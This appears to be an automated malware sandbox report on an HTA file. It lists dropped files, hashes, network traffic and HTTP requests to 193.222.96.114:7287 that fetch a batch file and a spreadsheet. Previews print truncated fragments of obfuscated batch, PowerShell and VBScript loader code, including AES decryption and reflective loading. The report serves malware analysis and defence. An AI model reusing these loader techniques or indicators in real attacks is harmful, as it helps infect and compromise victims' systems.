                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_whkbyoyv.adm.ps1

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y12wcujt.vlr.psm1

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y2sjeiom.gwy.psm1

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Roaming\GoGi.bat

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:DOS batch file, ASCII text, with very long lines (51202), with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):62296
                                                        Entropy (8bit):5.999975112908781
                                                        Encrypted:false
                                                        SSDEEP:1536:ts4yFTt4kNLNofpmw3dU7pVcJqmJQBULYJebJaRVmMWVXUpQk8daktj2aVv0+x/:tITGkDofH27pAD8YdYFpQk88kd2aJ/x/
                                                        MD5:CAB2108A81D68104DD9B15EFCEDF8351
                                                        SHA1:03852C18F75CAD87F71693FB1973D9A04E8910ED
                                                        SHA-256:A2DFE970DC385F9AA1A81946C4BC41144D182DBDDB02E37CE4C5B52C9B884AAA
                                                        SHA-512:E474CE03766F8E21FDB14E072144E8E1C5FA1F30E66EA4F7A05FADE86BD783FB4DEC65D23AB01861524959A0A029CB2112074116FDBD72D02AB4794216ED95F5
                                                        Malicious:true
                                                        Preview:@echo off..set "tPxaUE=setztepY sjztepYCJztepY=1ztepY &ztepY& ztepYsztepYtaztepYrt ztepY"ztepY" /ztepYmztepYinztepY ztepY"..set "JHuzvA=&& ztepYexiztepYtztepY"..set "sWWmDL=nztepYotztepY dztepYefiztepYneztepYd ztepYsjztepYCJztepY..if %sWWmDL:ztepY=% (%tPxaUE:ztepY=%%0 %JHuzvA:ztepY=%)..::Wexjq4bTaS6HQNZE+ed2dUOiXhuxWDsw9lfc1IY7tFjl0oZ5XV1qZ2My/j1yhAtlK2YV/KbwiemuWlyc1USBxQQxxJwUI7LG8lCpFRRrneuxJO9mKYqjpvn/cnMXwASFrpimoWq4ilUYYIeRmwdvDfBy4f0ySZj+ZrW4sfKSW879G43EUGnD/Ari7cHYdzKFW1zHzQTy0wuDk2WMAd7jwAvKFo7PaYRaLtAq+rRBu6VpYSJim/+hXIhSAbWCD6cMXY8dKZ4iRQNq1Bn4kdNf+VyyZaLaavKt9goy94bimZEhdA4gJs+Cr8b0+UdQpe8+IKQRh91Y8NVYWCDd2arCD67RNGC7qSXr0tKIbQaYq/21M/hmxLHV1HmGXV+haXP6oTj8vZfOZm+WQhZe6RJIDDdCOMg0V55jSeZDTCC5z4Xk9ql3gzMLtml030XaqyIaAqefreJynjTV7dBZVdEnOkl2v8vprdZS2nf9bIWGJ/LuONaWZCc57FjkhEg4rsuiCOP/1KASwomOQ3TcGAAHORX7TL+ro1I4nXyhbNIopthzFjoQVbi1mSitph/yA/1g1FWxl9KOaJRd95BS5Z33XCOLNlU7x8BOzlWB2WNFhNNcBh576qt2p2vczPnbrZyIxCCoBkX5yJTB83lLuIP/2hg4gRp/PJhPXKuNYt13Xg3UgYf+D3QnZ7SigtUCPCiAvQCoyzy

                                                        C:\Users\user\AppData\Roaming\jiteon.xlsx

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:Microsoft Excel 2007+
                                                        Category:dropped
                                                        Size (bytes):9842
                                                        Entropy (8bit):6.822783422329926
                                                        Encrypted:false
                                                        SSDEEP:192:KjbXbb3UNgKeK8c+sfyp/2HbdgH6D5loP:Kjz33pPc+b1I7D+
                                                        MD5:DFA28CEEF932C1605D40981A5023DAB0
                                                        SHA1:A6E8C5CDD144CB27685198FECAD8F9DEF48DFBE8
                                                        SHA-256:9E0BAC9938B4059F69ED52AF74337C38C242213ECD432746A483D44E1E74DFF6
                                                        SHA-512:28BC8A4C30E566A60280B194F5442C160F0B9C8B3DD10FA8D321035E7A3B76271373274B0D25BB8F04AC213F4293F3BDE7EE8C6FF7D77CAA2A4BA5276E0CCC80
                                                        Malicious:false
                                                        Preview:PK..........!.A7..n...........[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T.n.0..W.?D.V.........[$...x.X$...(.}'fQU...%Ql.[&.<...&YB@.l..YO$`....r.=.H.E...V....5........L..b.j"."%.5..3...N.B..?C%.*.....=..Y.K)u.b8x.R-.J.W..Q23V$..s.U....)..P....I.....].h.:C.@i...m2..3....1.. g../#..2...x|`.G....u_.;...U.O.w.j...s..4...-.Ze.N...x.e|.o,...... .1..y...s..i.......s......V7........88.....wa...:......Crh..........A..............PK..........!..U0#....L......._rels/.rels ...(...................

                                                        C:\Users\user\AppData\Roaming\~$jiteon.xlsx

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):165
                                                        Entropy (8bit):1.4377382811115937
                                                        Encrypted:false
                                                        SSDEEP:3:KVC+cAmltV:KVC+cR
                                                        MD5:9C7132B2A8CABF27097749F4D8447635
                                                        SHA1:71D7F78718A7AFC3EAB22ED395321F6CBE2F9899
                                                        SHA-256:7029AE5479F0CD98D892F570A22B2AE8302747DCFF3465B2DE64D974AE815A83
                                                        SHA-512:333AC8A4987CC7DF5981AE81238A77D123996DB2C4C97053E8BD2048A64FDCF33E1245DEE6839358161F6B5EEA6BFD8D2358BC4A9188D786295C22F79E2D635E
                                                        Malicious:false
                                                        Preview:.user ..j.o.n.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                        C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                        Download File
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):55
                                                        Entropy (8bit):4.306461250274409
                                                        Encrypted:false
                                                        SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                        MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                        SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                        SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                        SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                        Malicious:false
                                                        Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                        \Device\ConDrv

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with very long lines (2145), with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):2147
                                                        Entropy (8bit):5.779838178715233
                                                        Encrypted:false
                                                        SSDEEP:48:q2onXBS0NmhNrdR2Rd2Rxf8BmBYFSznk/kBJn3rGcTJsGcmtKWz:q5xSPh5dg+7f8BmBYFSzFx36cdHcmz
                                                        MD5:823D9DC33A7F86A3319E5DC91E2CB63B
                                                        SHA1:A407527A64E822DCD7FA0AE9EBA322429878A09C
                                                        SHA-256:202003A5881F3EA0451C758DD8C637246EB2A7D7BEDBD7DC6191015FBEEB38FA
                                                        SHA-512:E55099703BECFA1C271EBDDD5190A6502CFC5A901288CFA3FABB9A9C2280036ABB6A5AC0025F7F31A615AA27FA6E88D059D231AF4A1A0C9ED4BC250528C42A3E
                                                        Malicious:false
                                                        Preview:$host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\GoGi.bat';$gPQY='CmYpnhamYpnnmYpngmYpnemYpnEmYpnxtmYpnenmYpnsmYpniomYpnnmYpn'.Replace('mYpn', ''),'LoaUtEPdUtEP'.Replace('UtEP', ''),'MaiCYgQnMCYgQodCYgQuleCYgQ'.Replace('CYgQ', ''),'SprHTnlitrHTn'.Replace('rHTn', ''),'TrrzhRarzhRnsfrzhRorrzhRmFrzhRirzhRnarzhRlBlrzhRorzhRckrzhR'.Replace('rzhR', ''),'GetuUbXCuUbXuuUbXruUbXreuUbXntuUbXPuUbXrouUbXcuUbXesuUbXsuUbX'.Replace('uUbX', ''),'FrFEdOomBFEdOasFEdOe64FEdOStrFEdOiFEdOngFEdO'.Replace('FEdO', ''),'ReanclddLncldinencldsncld'.Replace('ncld', ''),'DjPqYejPqYcojPqYmpjPqYrejPqYssjPqY'.Replace('jPqY', ''),'IPIJhnvPIJhokPIJhePIJh'.Replace('PIJh', ''),'CopZKPiyTZKPioZKPi'.Replace('ZKPi', ''),'ElIXGDeIXGDmIXGDenIXGDtAIXGDtIXGD'.Replace('IXGD', ''),'CruXrmeuXrmatuXrmeDeuXrmcryuXrmptuXrmoruXrm'.Replace('uXrm', ''),'EJuQRntJuQRrJuQRyPJuQRoinJuQRtJuQR'.Replace('JuQR', '');powershell -w hidden;function oukWk($hMAdX){$uBEEb=[System.Security.Cryptography.Aes]::Create();$uBEEb.Mode=[System.Secu

                                                        Static File Info

                                                        General

                                                        File type:HTML document, ASCII text, with very long lines (12144), with CRLF line terminators
                                                        Entropy (8bit):3.414256201846169
                                                        TrID:
                                                        • Visual Basic Script (13500/0) 100.00%
                                                        File name:hta.hta
                                                        File size:13'193 bytes
                                                        MD5:dbc5a204c56d2c6c974bb9ce287978d4
                                                        SHA1:dca280ec6fcc06611132200b78bf9e7bd66504ef
                                                        SHA256:d8a8f1d0c357bdecb7bb471e1809231088ed6d4489355da038807aa1a73e964e
                                                        SHA512:6d169c338630b22fac4d68a35c03e48c990c467423829077c0689acfc12e462d1f9736c0b14146a85ade55c8ee775d06b6c4903b44287421a98b04a2bbdf60ea
                                                        SSDEEP:192:v3e+y2udOKE2FKvmbv22wZXiudbZv22wZXUpvuy:dKEsy
                                                        TLSH:6E4257E4025188C3E6830EF6F3957804EE2C157BBE49626865B0D413537E68893FEE9B
                                                        File Content Preview:<head>..<script language="vBsCRIPT">............Function DDVuglbxlLDq(ByVal YXynTpI).. Dim GNVetjPXcSep.. Dim MFEdIOkYQrzFGL.. MFEdIOkYQrzFGL = 59499.. Dim WDufyXOB.. WDufyXOB = cOGmqFFAvbHQ(YXynTpI).. If WDufyXOB = 7000 + 1204 Then..

                                                        Network Behavior

                                                        Network Port Distribution

                                                        TCP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Apr 20, 2024 16:05:04.951550961 CEST497307287192.168.2.4193.222.96.114
                                                        Apr 20, 2024 16:05:05.159631014 CEST728749730193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:05.160057068 CEST497307287192.168.2.4193.222.96.114
                                                        Apr 20, 2024 16:05:05.161431074 CEST497307287192.168.2.4193.222.96.114
                                                        Apr 20, 2024 16:05:05.367007971 CEST728749730193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:05.367685080 CEST728749730193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:05.367706060 CEST728749730193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:05.367728949 CEST728749730193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:05.367748976 CEST728749730193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:05.367770910 CEST728749730193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:05.367786884 CEST728749730193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:05.367804050 CEST728749730193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:05.367820024 CEST728749730193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:05.367835045 CEST728749730193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:05.367850065 CEST728749730193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:05.367856979 CEST497307287192.168.2.4193.222.96.114
                                                        Apr 20, 2024 16:05:05.367856979 CEST497307287192.168.2.4193.222.96.114
                                                        Apr 20, 2024 16:05:05.367909908 CEST497307287192.168.2.4193.222.96.114
                                                        Apr 20, 2024 16:05:05.367909908 CEST497307287192.168.2.4193.222.96.114
                                                        Apr 20, 2024 16:05:05.368077040 CEST728749730193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:05.368145943 CEST497307287192.168.2.4193.222.96.114
                                                        Apr 20, 2024 16:05:05.370291948 CEST497307287192.168.2.4193.222.96.114
                                                        Apr 20, 2024 16:05:05.571834087 CEST728749730193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:05.932460070 CEST497317287192.168.2.4193.222.96.114
                                                        Apr 20, 2024 16:05:06.135762930 CEST728749731193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:06.135915995 CEST497317287192.168.2.4193.222.96.114
                                                        Apr 20, 2024 16:05:06.136085033 CEST497317287192.168.2.4193.222.96.114
                                                        Apr 20, 2024 16:05:06.344352007 CEST728749731193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:06.360938072 CEST728749731193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:06.360987902 CEST728749731193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:06.361044884 CEST497317287192.168.2.4193.222.96.114
                                                        Apr 20, 2024 16:05:06.361346960 CEST728749731193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:06.361385107 CEST728749731193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:06.361422062 CEST728749731193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:06.361422062 CEST497317287192.168.2.4193.222.96.114
                                                        Apr 20, 2024 16:05:06.361459017 CEST728749731193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:06.361475945 CEST497317287192.168.2.4193.222.96.114
                                                        Apr 20, 2024 16:05:06.361499071 CEST728749731193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:06.361536980 CEST728749731193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:06.361547947 CEST497317287192.168.2.4193.222.96.114
                                                        Apr 20, 2024 16:05:06.361574888 CEST728749731193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:06.361612082 CEST728749731193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:06.361624002 CEST497317287192.168.2.4193.222.96.114
                                                        Apr 20, 2024 16:05:06.407387972 CEST497317287192.168.2.4193.222.96.114
                                                        Apr 20, 2024 16:05:06.563685894 CEST728749731193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:06.563734055 CEST728749731193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:06.563771009 CEST728749731193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:06.563798904 CEST497317287192.168.2.4193.222.96.114
                                                        Apr 20, 2024 16:05:06.563808918 CEST728749731193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:06.563864946 CEST728749731193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:06.563865900 CEST497317287192.168.2.4193.222.96.114
                                                        Apr 20, 2024 16:05:06.563901901 CEST728749731193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:06.563939095 CEST728749731193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:06.563975096 CEST728749731193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:06.563977003 CEST497317287192.168.2.4193.222.96.114
                                                        Apr 20, 2024 16:05:06.564013004 CEST728749731193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:06.564039946 CEST497317287192.168.2.4193.222.96.114
                                                        Apr 20, 2024 16:05:06.564050913 CEST728749731193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:06.564089060 CEST728749731193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:06.564117908 CEST497317287192.168.2.4193.222.96.114
                                                        Apr 20, 2024 16:05:06.564152956 CEST728749731193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:06.564189911 CEST728749731193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:06.564205885 CEST497317287192.168.2.4193.222.96.114
                                                        Apr 20, 2024 16:05:06.564228058 CEST728749731193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:06.564265966 CEST728749731193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:06.564281940 CEST497317287192.168.2.4193.222.96.114
                                                        Apr 20, 2024 16:05:06.564304113 CEST728749731193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:06.564341068 CEST728749731193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:06.564354897 CEST497317287192.168.2.4193.222.96.114
                                                        Apr 20, 2024 16:05:06.609314919 CEST728749731193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:06.609345913 CEST728749731193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:06.609389067 CEST497317287192.168.2.4193.222.96.114
                                                        Apr 20, 2024 16:05:06.657373905 CEST497317287192.168.2.4193.222.96.114
                                                        Apr 20, 2024 16:05:06.766402960 CEST728749731193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:06.766455889 CEST728749731193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:06.766494036 CEST728749731193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:06.766531944 CEST728749731193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:06.766535044 CEST497317287192.168.2.4193.222.96.114
                                                        Apr 20, 2024 16:05:06.766567945 CEST728749731193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:06.766583920 CEST497317287192.168.2.4193.222.96.114
                                                        Apr 20, 2024 16:05:06.766606092 CEST728749731193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:06.766642094 CEST728749731193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:06.766674042 CEST497317287192.168.2.4193.222.96.114
                                                        Apr 20, 2024 16:05:06.766680002 CEST728749731193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:06.766717911 CEST728749731193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:06.766740084 CEST497317287192.168.2.4193.222.96.114
                                                        Apr 20, 2024 16:05:06.766756058 CEST728749731193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:06.766794920 CEST728749731193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:06.766803026 CEST497317287192.168.2.4193.222.96.114
                                                        Apr 20, 2024 16:05:06.766832113 CEST728749731193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:06.766869068 CEST728749731193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:06.766882896 CEST497317287192.168.2.4193.222.96.114
                                                        Apr 20, 2024 16:05:06.766905069 CEST728749731193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:06.766942024 CEST728749731193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:06.766947985 CEST497317287192.168.2.4193.222.96.114
                                                        Apr 20, 2024 16:05:06.766978025 CEST728749731193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:06.767020941 CEST497317287192.168.2.4193.222.96.114
                                                        Apr 20, 2024 16:05:06.767034054 CEST728749731193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:06.767071009 CEST728749731193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:06.767108917 CEST728749731193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:06.767110109 CEST497317287192.168.2.4193.222.96.114
                                                        Apr 20, 2024 16:05:06.767149925 CEST728749731193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:06.767200947 CEST497317287192.168.2.4193.222.96.114
                                                        Apr 20, 2024 16:05:06.767294884 CEST497317287192.168.2.4193.222.96.114
                                                        Apr 20, 2024 16:05:06.969399929 CEST728749731193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:06:14.684237003 CEST49755443192.168.2.413.107.246.41
                                                        Apr 20, 2024 16:06:14.684289932 CEST4434975513.107.246.41192.168.2.4
                                                        Apr 20, 2024 16:06:14.684360981 CEST49755443192.168.2.413.107.246.41
                                                        Apr 20, 2024 16:06:14.684545994 CEST49756443192.168.2.413.107.246.41
                                                        Apr 20, 2024 16:06:14.684628010 CEST4434975613.107.246.41192.168.2.4
                                                        Apr 20, 2024 16:06:14.684719086 CEST49755443192.168.2.413.107.246.41
                                                        Apr 20, 2024 16:06:14.684734106 CEST4434975513.107.246.41192.168.2.4
                                                        Apr 20, 2024 16:06:14.684771061 CEST49756443192.168.2.413.107.246.41
                                                        Apr 20, 2024 16:06:14.684880972 CEST49756443192.168.2.413.107.246.41
                                                        Apr 20, 2024 16:06:14.684921026 CEST4434975613.107.246.41192.168.2.4
                                                        Apr 20, 2024 16:06:15.013262987 CEST4434975613.107.246.41192.168.2.4
                                                        Apr 20, 2024 16:06:15.013385057 CEST49756443192.168.2.413.107.246.41
                                                        Apr 20, 2024 16:06:15.015037060 CEST49756443192.168.2.413.107.246.41
                                                        Apr 20, 2024 16:06:15.015090942 CEST4434975613.107.246.41192.168.2.4
                                                        Apr 20, 2024 16:06:15.015435934 CEST4434975613.107.246.41192.168.2.4
                                                        Apr 20, 2024 16:06:15.016830921 CEST49756443192.168.2.413.107.246.41
                                                        Apr 20, 2024 16:06:15.017524004 CEST4434975513.107.246.41192.168.2.4
                                                        Apr 20, 2024 16:06:15.017606974 CEST49755443192.168.2.413.107.246.41
                                                        Apr 20, 2024 16:06:15.018910885 CEST49755443192.168.2.413.107.246.41
                                                        Apr 20, 2024 16:06:15.018918037 CEST4434975513.107.246.41192.168.2.4
                                                        Apr 20, 2024 16:06:15.019227028 CEST4434975513.107.246.41192.168.2.4
                                                        Apr 20, 2024 16:06:15.020342112 CEST49755443192.168.2.413.107.246.41
                                                        Apr 20, 2024 16:06:15.064126015 CEST4434975613.107.246.41192.168.2.4
                                                        Apr 20, 2024 16:06:15.068120003 CEST4434975513.107.246.41192.168.2.4
                                                        Apr 20, 2024 16:06:15.219681025 CEST4434975513.107.246.41192.168.2.4
                                                        Apr 20, 2024 16:06:15.219742060 CEST4434975513.107.246.41192.168.2.4
                                                        Apr 20, 2024 16:06:15.219831944 CEST4434975513.107.246.41192.168.2.4
                                                        Apr 20, 2024 16:06:15.219903946 CEST4434975513.107.246.41192.168.2.4
                                                        Apr 20, 2024 16:06:15.219978094 CEST49755443192.168.2.413.107.246.41
                                                        Apr 20, 2024 16:06:15.222875118 CEST49755443192.168.2.413.107.246.41
                                                        Apr 20, 2024 16:06:15.222894907 CEST4434975513.107.246.41192.168.2.4
                                                        Apr 20, 2024 16:06:15.222903013 CEST49755443192.168.2.413.107.246.41
                                                        Apr 20, 2024 16:06:15.222909927 CEST4434975513.107.246.41192.168.2.4
                                                        Apr 20, 2024 16:06:15.362694025 CEST4434975613.107.246.41192.168.2.4
                                                        Apr 20, 2024 16:06:15.362741947 CEST4434975613.107.246.41192.168.2.4
                                                        Apr 20, 2024 16:06:15.362936020 CEST4434975613.107.246.41192.168.2.4
                                                        Apr 20, 2024 16:06:15.363147974 CEST49756443192.168.2.413.107.246.41
                                                        Apr 20, 2024 16:06:15.363148928 CEST49756443192.168.2.413.107.246.41
                                                        Apr 20, 2024 16:06:15.363148928 CEST49756443192.168.2.413.107.246.41
                                                        Apr 20, 2024 16:06:15.673096895 CEST49756443192.168.2.413.107.246.41
                                                        Apr 20, 2024 16:06:15.673157930 CEST4434975613.107.246.41192.168.2.4

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Apr 20, 2024 16:05:10.735976934 CEST1.1.1.1192.168.2.40x9bb1No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                        Apr 20, 2024 16:05:10.735976934 CEST1.1.1.1192.168.2.40x9bb1No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                        Apr 20, 2024 16:06:14.683252096 CEST1.1.1.1192.168.2.40x1357No error (0)shed.dual-low.part-0013.t-0009.t-msedge.netpart-0013.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                        Apr 20, 2024 16:06:14.683252096 CEST1.1.1.1192.168.2.40x1357No error (0)part-0013.t-0009.t-msedge.net13.107.246.41A (IP address)IN (0x0001)false
                                                        Apr 20, 2024 16:06:14.683252096 CEST1.1.1.1192.168.2.40x1357No error (0)part-0013.t-0009.t-msedge.net13.107.213.41A (IP address)IN (0x0001)false

                                                        HTTP Request Dependency Graph

                                                        • otelrules.azureedge.net
                                                        • 193.222.96.114:7287

                                                        HTTP Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.449730193.222.96.11472877332C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        TimestampBytes transferredDirectionData
                                                        Apr 20, 2024 16:05:05.161431074 CEST80OUTGET /jiteon.xlsx HTTP/1.1
                                                        Host: 193.222.96.114:7287
                                                        Connection: Keep-Alive
                                                        Apr 20, 2024 16:05:05.367007971 CEST17INHTTP/1.1 200 OK


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        1192.168.2.449731193.222.96.11472877332C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        TimestampBytes transferredDirectionData
                                                        Apr 20, 2024 16:05:06.136085033 CEST53OUTGET /GoGi.bat HTTP/1.1
                                                        Host: 193.222.96.114:7287
                                                        Apr 20, 2024 16:05:06.344352007 CEST17INHTTP/1.1 200 OK


                                                        HTTPS Proxied Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.44975613.107.246.414437500C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                        TimestampBytes transferredDirectionData
                                                        2024-04-20 14:06:15 UTC208OUTGET /rules/rule170012v10s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-04-20 14:06:15 UTC564INHTTP/1.1 200 OK
                                                        Date: Sat, 20 Apr 2024 14:06:15 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 1523
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Vary: Accept-Encoding
                                                        Vary: Accept-Encoding
                                                        Vary: Accept-Encoding
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:27:33 GMT
                                                        ETag: "0x8DC582BD969CD29"
                                                        x-ms-request-id: a666d262-c01e-0047-372b-93d7e7000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20240420T140615Z-16f7b4795d46g992h39k4er964000000012000000000094r
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_MISS
                                                        Accept-Ranges: bytes
